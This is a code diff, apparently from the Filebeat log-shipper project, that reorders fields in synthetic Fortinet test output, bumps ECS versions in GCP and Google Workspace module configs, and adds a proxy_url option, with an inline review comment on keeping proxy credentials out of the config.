@@ -1242,9 +1242,9 @@ "xea" ], "related.ip": [ - "10.98.194.212", "10.233.120.207", - "10.51.213.42" + "10.51.213.42", + "10.98.194.212" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -1309,8 +1309,8 @@ "tla" ], "related.ip": [ - "10.67.132.242", "10.245.187.229", + "10.67.132.242", "10.241.132.176" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -1375,8 +1375,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.1847", "related.hosts": [ - "uii", "cingel", + "uii", "tore7088.www.invalid" ], "related.ip": [ @@ -1561,13 +1561,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4450", "related.hosts": [ - "saquaea", "billoi", + "saquaea", "eturad6143.www.home" ], "related.ip": [ - "10.95.117.134", - "10.128.46.70" + "10.128.46.70", + "10.95.117.134" ], "related.user": [ "enim" @@ -1577,8 +1577,8 @@ "rsa.investigations.event_vcat": "boNem", "rsa.misc.OS": "ntium", "rsa.misc.action": [ - "acommodi", - "block" + "block", + "acommodi" ], "rsa.misc.category": "inrepreh", "rsa.misc.client": "moles", @@ -1659,8 +1659,8 @@ "orinrep5386.www.corp" ], "related.ip": [ - "10.253.228.140", - "10.208.21.135" + "10.208.21.135", + "10.253.228.140" ], "related.user": [ "inculp" @@ -1747,13 +1747,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.1710", "related.hosts": [ - "edquia", "Nemo", + "edquia", "henderi724.www5.home" ], "related.ip": [ - "10.3.23.172", - "10.243.226.122" + "10.243.226.122", + "10.3.23.172" ], "related.user": [ "olorem" @@ -1845,8 +1845,8 @@ "reseosqu1629.mail.lan" ], "related.ip": [ - "10.94.242.80", - "10.106.85.174" + "10.106.85.174", + "10.94.242.80" ], "related.user": [ "lmo" @@ -1856,8 +1856,8 @@ "rsa.investigations.event_vcat": "snostrum", "rsa.misc.OS": "tiaecon", "rsa.misc.action": [ - "cancel", - "atiset" + "atiset", + "cancel" ], "rsa.misc.category": "ehende", "rsa.misc.client": "umquam", 
@@ -1935,9 +1935,9 @@ "oluptat" ], "related.ip": [ - "10.247.53.179", "10.117.63.181", - "10.168.20.20" + "10.168.20.20", + "10.247.53.179" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2002,13 +2002,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.2208", "related.hosts": [ - "duntut", "lamcola", + "duntut", "tasnul4179.internal.host" ], "related.ip": [ - "10.141.156.217", - "10.53.168.187" + "10.53.168.187", + "10.141.156.217" ], "related.user": [ "amqu" @@ -2018,8 +2018,8 @@ "rsa.investigations.event_vcat": "illumq", "rsa.misc.OS": "idata", "rsa.misc.action": [ - "block", - "emacc" + "emacc", + "block" ], "rsa.misc.category": "ueporro", "rsa.misc.client": "veli", @@ -2096,8 +2096,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.3402", "related.hosts": [ - "imavenia", "tur", + "imavenia", "bore5546.www.local" ], "related.ip": [ @@ -2189,13 +2189,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.91", "related.hosts": [ - "Dui", "amquisno", + "Dui", "Utenima260.mail.invalid" ], "related.ip": [ - "10.151.170.207", - "10.181.183.104" + "10.181.183.104", + "10.151.170.207" ], "related.user": [ "iosamni" @@ -2205,8 +2205,8 @@ "rsa.investigations.event_vcat": "eturadip", "rsa.misc.OS": "onsecte", "rsa.misc.action": [ - "amni", - "cancel" + "cancel", + "amni" ], "rsa.misc.category": "umdolore", "rsa.misc.client": "modoc", @@ -2282,8 +2282,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.7278", "related.hosts": [ - "liquaUte", "ectetura", + "liquaUte", "uido2046.mail.lan" ], "related.ip": [ @@ -2298,8 +2298,8 @@ "rsa.investigations.event_vcat": "uatu", "rsa.misc.OS": "tnulapar", "rsa.misc.action": [ - "odic", - "deny" + "deny", + "odic" ], "rsa.misc.category": "deri", "rsa.misc.client": "scivelit", 
@@ -2377,8 +2377,8 @@ ], "related.ip": [ "10.37.161.101", - "10.111.182.212", - "10.17.209.252" + "10.17.209.252", + "10.111.182.212" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2444,8 +2444,8 @@ ], "related.ip": [ "10.153.166.133", - "10.170.196.181", - "10.158.175.98" + "10.158.175.98", + "10.170.196.181" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2509,8 +2509,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.5978", "related.hosts": [ - "tuser", "porissu", + "tuser", "con6049.internal.lan" ], "related.ip": [ @@ -2670,9 +2670,9 @@ "ons" ], "related.ip": [ + "10.36.99.207", "10.166.142.198", - "10.225.37.73", - "10.36.99.207" + "10.225.37.73" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2737,9 +2737,9 @@ "eturadip" ], "related.ip": [ - "10.66.90.225", "10.145.194.12", - "10.214.156.161" + "10.214.156.161", + "10.66.90.225" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2804,9 +2804,9 @@ "iutal" ], "related.ip": [ - "10.156.208.5", + "10.163.36.101", "10.6.242.108", - "10.163.36.101" + "10.156.208.5" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -2870,13 +2870,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4713", "related.hosts": [ - "epteurs", "data", + "epteurs", "remeum2641.www5.corp" ], "related.ip": [ - "10.68.233.163", - "10.220.148.127" + "10.220.148.127", + "10.68.233.163" ], "related.user": [ "estiaec" @@ -2886,8 +2886,8 @@ "rsa.investigations.event_vcat": "olore", "rsa.misc.OS": "tatem", "rsa.misc.action": [ - "itanimi", - "allow" + "allow", + "itanimi" ], "rsa.misc.category": "psa", "rsa.misc.client": "ugits", 
@@ -3057,13 +3057,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4442", "related.hosts": [ - "fugi", "uae", + "fugi", "mea6298.api.example" ], "related.ip": [ - "10.113.152.241", - "10.115.121.243" + "10.115.121.243", + "10.113.152.241" ], "related.user": [ "norumetM" @@ -3073,8 +3073,8 @@ "rsa.investigations.event_vcat": "teirured", "rsa.misc.OS": "oloremi", "rsa.misc.action": [ - "cancel", - "ali" + "ali", + "cancel" ], "rsa.misc.category": "idolor", "rsa.misc.client": "imveni", @@ -3155,8 +3155,8 @@ "iqu7510.internal.corp" ], "related.ip": [ - "10.179.153.97", - "10.49.82.45" + "10.49.82.45", + "10.179.153.97" ], "related.user": [ "dictasun" @@ -3166,8 +3166,8 @@ "rsa.investigations.event_vcat": "tatemse", "rsa.misc.OS": "eturadi", "rsa.misc.action": [ - "ade", - "accept" + "accept", + "ade" ], "rsa.misc.category": "laboreet", "rsa.misc.client": "ano", @@ -3245,8 +3245,8 @@ ], "related.ip": [ "10.99.55.115", - "10.205.83.138", - "10.98.52.184" + "10.98.52.184", + "10.205.83.138" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3311,9 +3311,9 @@ "reprehe" ], "related.ip": [ - "10.90.189.248", "10.197.128.162", - "10.228.11.50" + "10.228.11.50", + "10.90.189.248" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3424,8 +3424,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.7318", "related.hosts": [ - "ptat", "umdol", + "ptat", "deFinibu3940.internal.lan" ], "related.ip": [ @@ -3745,9 +3745,9 @@ "usantiu" ], "related.ip": [ - "10.118.111.183", + "10.140.59.161", "10.5.67.140", - "10.140.59.161" + "10.118.111.183" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -3811,13 +3811,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.4493", "related.hosts": [ - "veleumiu", "labor", + "veleumiu", "nimadmi4084.api.home" ], "related.ip": [ - "10.28.212.191", - "10.7.70.169" + "10.7.70.169", + "10.28.212.191" ], "related.user": [ "itsed" 
@@ -3827,8 +3827,8 @@ "rsa.investigations.event_vcat": "Loremips", "rsa.misc.OS": "eritquii", "rsa.misc.action": [ - "nostru", - "accept" + "accept", + "nostru" ], "rsa.misc.category": "amnisiu", "rsa.misc.client": "rcita", @@ -3920,8 +3920,8 @@ "rsa.investigations.event_vcat": "uep", "rsa.misc.OS": "iatisund", "rsa.misc.action": [ - "block", - "nvo" + "nvo", + "block" ], "rsa.misc.category": "tenima", "rsa.misc.client": "iuntNe", @@ -3999,8 +3999,8 @@ ], "related.ip": [ "10.22.149.132", - "10.251.183.113", - "10.217.145.137" + "10.217.145.137", + "10.251.183.113" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -4065,8 +4065,8 @@ "nisi" ], "related.ip": [ - "10.183.16.252", "10.51.60.203", + "10.183.16.252", "10.203.66.175" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -4131,13 +4131,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.409", "related.hosts": [ - "magnama", "doei", + "magnama", "ursint411.www.lan" ], "related.ip": [ - "10.157.14.165", - "10.61.200.105" + "10.61.200.105", + "10.157.14.165" ], "related.user": [ "nimadmi" @@ -4224,13 +4224,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5475", "related.hosts": [ - "rcita", "antium", + "rcita", "ididunt7607.mail.localhost" ], "related.ip": [ - "10.217.111.77", - "10.242.178.15" + "10.242.178.15", + "10.217.111.77" ], "related.user": [ "nimadmin" @@ -4240,8 +4240,8 @@ "rsa.investigations.event_vcat": "psaqu", "rsa.misc.OS": "nevolu", "rsa.misc.action": [ - "datatno", - "allow" + "allow", + "datatno" ], "rsa.misc.category": "ionu", "rsa.misc.client": "ugiatn", @@ -4317,8 +4317,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.142", "related.hosts": [ - "ommodoco", "rsita", + "ommodoco", "mco2906.domain" ], "related.ip": [ @@ -4333,8 +4333,8 @@ "rsa.investigations.event_vcat": "ora", "rsa.misc.OS": "ommod", "rsa.misc.action": [ - "cancel", - "ant" + "ant", + "cancel" ], "rsa.misc.category": "rehende", "rsa.misc.client": "rehe", 
@@ -4415,8 +4415,8 @@ "ntex5135.corp" ], "related.ip": [ - "10.239.194.105", - "10.234.171.117" + "10.234.171.117", + "10.239.194.105" ], "related.user": [ "tat" @@ -4571,8 +4571,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.6905", "related.hosts": [ - "rveli", "aaliq", + "rveli", "tat1845.internal.invalid" ], "related.ip": [ @@ -4587,8 +4587,8 @@ "rsa.investigations.event_vcat": "agnaaliq", "rsa.misc.OS": "itte", "rsa.misc.action": [ - "allow", - "Sedut" + "Sedut", + "allow" ], "rsa.misc.category": "aqueip", "rsa.misc.client": "serr", @@ -4664,13 +4664,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.1353", "related.hosts": [ - "nibusB", "iatn", + "nibusB", "ulamc767.internal.lan" ], "related.ip": [ - "10.112.155.228", - "10.47.191.95" + "10.47.191.95", + "10.112.155.228" ], "related.user": [ "aed" @@ -4825,9 +4825,9 @@ "litsedq" ], "related.ip": [ - "10.90.229.92", "10.251.212.166", - "10.77.105.160" + "10.77.105.160", + "10.90.229.92" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -4907,8 +4907,8 @@ "rsa.investigations.event_vcat": "animi", "rsa.misc.OS": "tisunde", "rsa.misc.action": [ - "aut", - "cancel" + "cancel", + "aut" ], "rsa.misc.category": "lamcorpo", "rsa.misc.client": "com", @@ -4984,8 +4984,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.491", "related.hosts": [ - "edutpe", "boru", + "edutpe", "istenatu3686.invalid" ], "related.ip": [ @@ -5145,8 +5145,8 @@ "llumdo" ], "related.ip": [ - "10.239.231.168", "10.242.119.111", + "10.239.231.168", "10.188.131.18" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -5216,8 +5216,8 @@ "tru3812.mail.lan" ], "related.ip": [ - "10.247.124.74", - "10.106.101.87" + "10.106.101.87", + "10.247.124.74" ], "related.user": [ "ainci" @@ -5444,8 +5444,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.6452", "related.hosts": [ - "cons", "tem", + "cons", "mdolo7008.api.corp" ], "related.ip": [ 
@@ -5460,8 +5460,8 @@ "rsa.investigations.event_vcat": "adol", "rsa.misc.OS": "ita", "rsa.misc.action": [ - "accept", - "uptat" + "uptat", + "accept" ], "rsa.misc.category": "uidexea", "rsa.misc.client": "orpori", @@ -5605,8 +5605,8 @@ "caecatcu" ], "related.ip": [ - "10.249.93.150", "10.154.151.111", + "10.249.93.150", "10.7.230.206" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -5671,13 +5671,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.5718", "related.hosts": [ - "quirat", "ptatem", + "quirat", "itse5466.api.example" ], "related.ip": [ - "10.217.209.221", - "10.26.4.3" + "10.26.4.3", + "10.217.209.221" ], "related.user": [ "ciduntut" @@ -5687,8 +5687,8 @@ "rsa.investigations.event_vcat": "santiumd", "rsa.misc.OS": "oris", "rsa.misc.action": [ - "rsitame", - "deny" + "deny", + "rsitame" ], "rsa.misc.category": "agnaal", "rsa.misc.client": "urmagn", @@ -5857,13 +5857,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.2052", "related.hosts": [ - "dat", "asp", + "dat", "amco1592.mail.host" ], "related.ip": [ - "10.62.140.108", - "10.110.99.222" + "10.110.99.222", + "10.62.140.108" ], "related.user": [ "moenimi" @@ -5873,8 +5873,8 @@ "rsa.investigations.event_vcat": "atvolupt", "rsa.misc.OS": "riosam", "rsa.misc.action": [ - "deny", - "ssitasp" + "ssitasp", + "deny" ], "rsa.misc.category": "enimadmi", "rsa.misc.client": "uatDui", @@ -5966,8 +5966,8 @@ "rsa.investigations.event_vcat": "cupidata", "rsa.misc.OS": "ficiade", "rsa.misc.action": [ - "lorem", - "accept" + "accept", + "lorem" ], "rsa.misc.category": "iac", "rsa.misc.client": "tlabo", @@ -6044,9 +6044,9 @@ "eleumiu" ], "related.ip": [ - "10.236.211.111", + "10.120.212.78", "10.221.100.157", - "10.120.212.78" + "10.236.211.111" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ 
@@ -6110,13 +6110,13 @@ "observer.vendor": "Fortinet", "observer.version": "1.3052", "related.hosts": [ - "xeacom", "tenima", + "xeacom", "pidatatn2627.www.localdomain" ], "related.ip": [ - "10.210.82.202", - "10.208.231.15" + "10.208.231.15", + "10.210.82.202" ], "related.user": [ "riatur" @@ -6204,9 +6204,9 @@ "nimides" ], "related.ip": [ - "10.123.59.69", + "10.53.251.202", "10.226.255.3", - "10.53.251.202" + "10.123.59.69" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6271,9 +6271,9 @@ "edut" ], "related.ip": [ - "10.29.141.252", + "10.3.85.176", "10.212.56.26", - "10.3.85.176" + "10.29.141.252" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6353,8 +6353,8 @@ "rsa.investigations.event_vcat": "ill", "rsa.misc.OS": "eabill", "rsa.misc.action": [ - "atemqui", - "cancel" + "cancel", + "atemqui" ], "rsa.misc.category": "idatatno", "rsa.misc.client": "res", @@ -6498,8 +6498,8 @@ "datatno" ], "related.ip": [ - "10.74.88.209", "10.238.49.73", + "10.74.88.209", "10.92.3.166" ], "rsa.internal.messageid": "generic_fortinetmgr_1", @@ -6565,9 +6565,9 @@ "ptate" ], "related.ip": [ - "10.119.248.36", + "10.187.107.47", "10.84.200.121", - "10.187.107.47" + "10.119.248.36" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -6703,8 +6703,8 @@ "rspic5637.api.local" ], "related.ip": [ - "10.115.166.48", - "10.169.133.219" + "10.169.133.219", + "10.115.166.48" ], "related.user": [ "emq" @@ -6791,8 +6791,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.4195", "related.hosts": [ - "Except", "aconse", + "Except", "rror3870.www5.local" ], "related.ip": [ @@ -6807,8 +6807,8 @@ "rsa.investigations.event_vcat": "ntexp", "rsa.misc.OS": "aconseq", "rsa.misc.action": [ - "block", - "oluptate" + "oluptate", + "block" ], "rsa.misc.category": "edqu", "rsa.misc.client": "ites", 
@@ -6952,9 +6952,9 @@ "oeius" ], "related.ip": [ + "10.233.128.7", "10.66.149.234", - "10.186.253.240", - "10.233.128.7" + "10.186.253.240" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7019,9 +7019,9 @@ "irat" ], "related.ip": [ + "10.227.133.134", "10.46.11.114", - "10.173.140.201", - "10.227.133.134" + "10.173.140.201" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7087,8 +7087,8 @@ ], "related.ip": [ "10.170.236.123", - "10.69.130.207", - "10.205.18.11" + "10.205.18.11", + "10.69.130.207" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7157,8 +7157,8 @@ "velill3821.mail.invalid" ], "related.ip": [ - "10.124.34.251", - "10.97.254.192" + "10.97.254.192", + "10.124.34.251" ], "related.user": [ "epor" @@ -7168,8 +7168,8 @@ "rsa.investigations.event_vcat": "lica", "rsa.misc.OS": "taedi", "rsa.misc.action": [ - "deny", - "imide" + "imide", + "deny" ], "rsa.misc.category": "iurere", "rsa.misc.client": "ollitan", @@ -7360,9 +7360,9 @@ "uipex" ], "related.ip": [ - "10.212.208.70", + "10.35.84.125", "10.37.120.29", - "10.35.84.125" + "10.212.208.70" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7428,8 +7428,8 @@ ], "related.ip": [ "10.143.65.84", - "10.207.207.106", - "10.199.201.26" + "10.199.201.26", + "10.207.207.106" ], "rsa.internal.messageid": "generic_fortinetmgr_1", "rsa.misc.action": [ @@ -7644,8 +7644,8 @@ "rsa.investigations.event_vcat": "lupt", "rsa.misc.OS": "etdolo", "rsa.misc.action": [ - "amnihilm", - "allow" + "allow", + "amnihilm" ], "rsa.misc.category": "ntin", "rsa.misc.client": "xcep", @@ -7721,8 +7721,8 @@ "observer.vendor": "Fortinet", "observer.version": "1.2314", "related.hosts": [ - "umtotam", "stenat", + "umtotam", "unt2122.internal.local" ], "related.ip": [ 
@@ -7819,8 +7819,8 @@ "luptat2613.internal.localhost" ], "related.ip": [ - "10.182.124.88", - "10.139.144.75" + "10.139.144.75", + "10.182.124.88" ], "related.user": [ "modo" @@ -7830,8 +7830,8 @@ "rsa.investigations.event_vcat": "tfug", "rsa.misc.OS": "imipsam", "rsa.misc.action": [ - "block", - "utodi" + "utodi", + "block" ], "rsa.misc.category": "cid", "rsa.misc.client": "mquaerat", @@ -7912,8 +7912,8 @@ "neavo4796.internal.domain" ], "related.ip": [ - "10.35.10.19", - "10.188.124.185" + "10.188.124.185", + "10.35.10.19" ], "related.user": [ "dolo" diff --git a/x-pack/filebeat/module/gcp/audit/config/input.yml b/x-pack/filebeat/module/gcp/audit/config/input.yml index b1ba0148832..4945e01447b 100644 --- a/x-pack/filebeat/module/gcp/audit/config/input.yml +++ b/x-pack/filebeat/module/gcp/audit/config/input.yml @@ -34,4 +34,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json index 8b4b2ed642d..d7e057c466a 100644 --- a/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json +++ b/x-pack/filebeat/module/gcp/audit/test/audit-log-entries.json.log-expected.json @@ -80,6 +80,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", @@ -137,6 +138,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", 
@@ -189,6 +191,7 @@ ], "user.email": "xxx@xxx.xxx", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:71.0) Gecko/20100101 Firefox/71.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", @@ -235,6 +238,7 @@ ], "user.email": "system:serviceaccount:cert-manager:cert-manager-webhook", "user_agent.device.name": "Other", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "webhook/v0.0.0 (linux/amd64) kubernetes/$Format", "user_agent.os.name": "Linux" @@ -293,6 +297,7 @@ ], "user.email": "user@mycompany.com", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Other", "user_agent.original": "google-cloud-sdk gcloud/290.0.1 command/gcloud.compute.images.create invocation-id/032752ad0fa44b4ea951951d2deef6a3 environment/None environment-version/None interactive/True from-script/False python/2.7.17 term/xterm-256color (Macintosh; Intel Mac OS X 19.6.0),gzip(gfe)", "user_agent.os.full": "Mac OS X 19.6.0", @@ -339,6 +344,7 @@ ], "user.email": "user@mycompany.com", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0,gzip(gfe),gzip(gfe)", "user_agent.os.full": "Mac OS X 10.15", diff --git a/x-pack/filebeat/module/gcp/firewall/config/input.yml b/x-pack/filebeat/module/gcp/firewall/config/input.yml index cc914cedfca..05e4fc5c10e 100644 --- a/x-pack/filebeat/module/gcp/firewall/config/input.yml +++ b/x-pack/filebeat/module/gcp/firewall/config/input.yml @@ -38,4 +38,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml index fbcfc88a79a..ded34be1443 100644 
--- a/x-pack/filebeat/module/gcp/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/config/input.yml @@ -37,4 +37,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml index 1f67548e0db..4cd314d574f 100644 --- a/x-pack/filebeat/module/gcp/vpcflow/manifest.yml +++ b/x-pack/filebeat/module/gcp/vpcflow/manifest.yml @@ -2,7 +2,7 @@ module_version: "1.0" var: - name: input - default: google-pubsub + default: gcp-pubsub - name: project_id default: SET_PROJECT_NAME - name: topic diff --git a/x-pack/filebeat/module/google_workspace/admin/config/config.yml b/x-pack/filebeat/module/google_workspace/admin/config/config.yml index 8c2c3824ed7..ec18b343898 100644 --- a/x-pack/filebeat/module/google_workspace/admin/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/admin/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common 
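Review bot: The new `request.proxy_url: {{ .proxy_url }}` line in the first hunk of google_workspace/admin/config/config.yml has no comment on what the value may contain, so a proxy URL with embedded `user:password@` credentials would sit in clear text in the module configuration. I would add a comment above the `{{ if .proxy_url }}` block, `# proxy_url: forward proxy for the Reports API requests; keep any proxy credentials in the Beats keystore, not inline`. The same applies to the identical hunks in the drive, groups and login config.yml files. Whether the OAuth2 token request also goes through this proxy cannot be told from the hunk, which matters where direct egress is blocked or monitored. The httpjson block these lines belong to starts above the hunk.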
diff --git a/x-pack/filebeat/module/google_workspace/admin/manifest.yml b/x-pack/filebeat/module/google_workspace/admin/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/admin/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/admin/manifest.yml @@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/drive/config/config.yml b/x-pack/filebeat/module/google_workspace/drive/config/config.yml index 18eacfef7a2..9f00099c8a6 100644 --- a/x-pack/filebeat/module/google_workspace/drive/config/config.yml +++ b/x-pack/filebeat/module/google_workspace/drive/config/config.yml @@ -11,11 +11,14 @@ request.url: https://www.googleapis.com/admin/reports/v1/activity/users/{{ .user {{ if .http_client_timeout }} request.timeout: {{ .http_client_timeout }} {{ end }} +{{ if .proxy_url }} +request.proxy_url: {{ .proxy_url }} +{{ end }} request.transforms: - set: target: url.params.startTime value: "[[.cursor.last_execution_datetime]]" - default: '[[parseDate now (parseDuration "-{{.initial_interval}}")]]' + default: '[[formatDate (now (parseDuration "-{{.initial_interval}}"))]]' response.split: target: body.items split: @@ -27,7 +30,7 @@ response.pagination: value: "[[.last_response.body.nextPageToken]]" cursor: last_execution_datetime: - value: "[[now]]" + value: "[[formatDate now]]" {{ else if eq .input "file" }} type: log @@ -45,7 +48,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - script: lang: javascript id: gworkspace-common diff --git a/x-pack/filebeat/module/google_workspace/drive/manifest.yml b/x-pack/filebeat/module/google_workspace/drive/manifest.yml index 48570efe448..c5992776ac0 100644 --- a/x-pack/filebeat/module/google_workspace/drive/manifest.yml +++ b/x-pack/filebeat/module/google_workspace/drive/manifest.yml 
@@ -15,6 +15,7 @@ var: default: 2h - name: tags default: [forwarded] + - name: proxy_url input: config/config.yml ingest_pipeline: ../ingest/common.yml diff --git a/x-pack/filebeat/module/google_workspace/fields.go b/x-pack/filebeat/module/google_workspace/fields.go index a17ca4dd5a4..8ce7b296cf7 100644 --- a/x-pack/filebeat/module/google_workspace/fields.go +++ b/x-pack/filebeat/module/google_workspace/fields.go 
@@ -19,5 +19,5 @@ func init() { // AssetGoogleWorkspace returns asset data. // This is the base64 encoded gzipped contents of module/google_workspace. func AssetGoogleWorkspace() string { - return "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" + return "eJzkXFtz3LaSfvev6EoevJuKRrV51MNWaS3FcUWyVZacbOrUKQoDNIeIQIAGwBnP+fWncOGIMyTnBsqe5OjFriHxfY3GrbvRzTN4wuUFzJSaCcwWSj+ZilB8BWC5FXgB320++u4VAENDNa8sV/IC/vcVAMBb/xr83rwGt4rVwgHlHAUzF/6tM5CkxF4+98cwJ7WwmW9yATkRpnlkl5Vrp1VdrV7uCNEriKmQ8pzTKMjk1erVW6URuMyVLomDATJVtd1sAJRImCLkqpYMiIXC2spcnJ8znKNQFWozCf2ZUFWeE1ZyeWbY07nGSmlrzuf/c64xR42S4jmhls+55WjOBTc2ytLWUVtPhFqlJ67vq0eNKp5wuVCatX4fUIj7eyjQNwOVR8xXa89/I6LGpqcXa48Afvh0f/3xhwu4lMoWqKE2qIFLsAWCISUCUyXhcrLZ7Pr/H64/vr+8yZr2oaWqreEMffOBlr9e/+Hfl0qeFXVJZCN0v36ecJmmng9SLKHSaFBaWBQo4fFZ84/ADTz+ev3H4wTehKngRH+kSpq6RJ094fLRKdb9qvFzjcYqDbnS8OGytgX8dPMBLu/eNc8MKA1EAmcoLc85hne1mioLhFJVS2u6XcU5SjvyVOisFU/yI5SkqpBBrlUJj9xiaf7xz4l/5v4TlRImgNJ8xiURUJGlUIStj+U1oQXkXKBB62dXQeYIBBjP/YKw4B6oHOZhAjpFcCeAW5kMLeHiq6w/94dfSFm5LY/UjNvv44vLzkA8ccnGG4IwMYyqNcUNxTuiPfV8e8L6UnpGJP+X32EnYcGnqS8oMCCBLYh1C5TkOVKLDKbLuBBdZ16buG66O4frdkeO9vkCPfvyGkJVCU5Dt5Bx9++GmEN96/TP9ae7FgPmZCe5+yWFuYX12nj83ZwoyVTgJvRBtBFiDXYnr+DUTUuTKc1QZ7Iup6iPleKDw4CA4c4mBlaBRoZYgicyaA4Qqao1LYg5XivvgyQqhwYTVpi75eBJo9FCgndXu9mIqbLxGFcmV0WMcY33kqEi9InMMFGOUk25WBcnAg8K4beJCZaEixRmD/PaQKV5SfQSPCAQxjSagYkncZH5szKFV+IiHLj+vPVmHFrL5ayfUwmWzqkEO4hTz7Jacpu8ubVPHyLAYW7Z4la0eS2ShlbpWeByQFARWwCXVNSMy1k4n5Syz28NS9Ro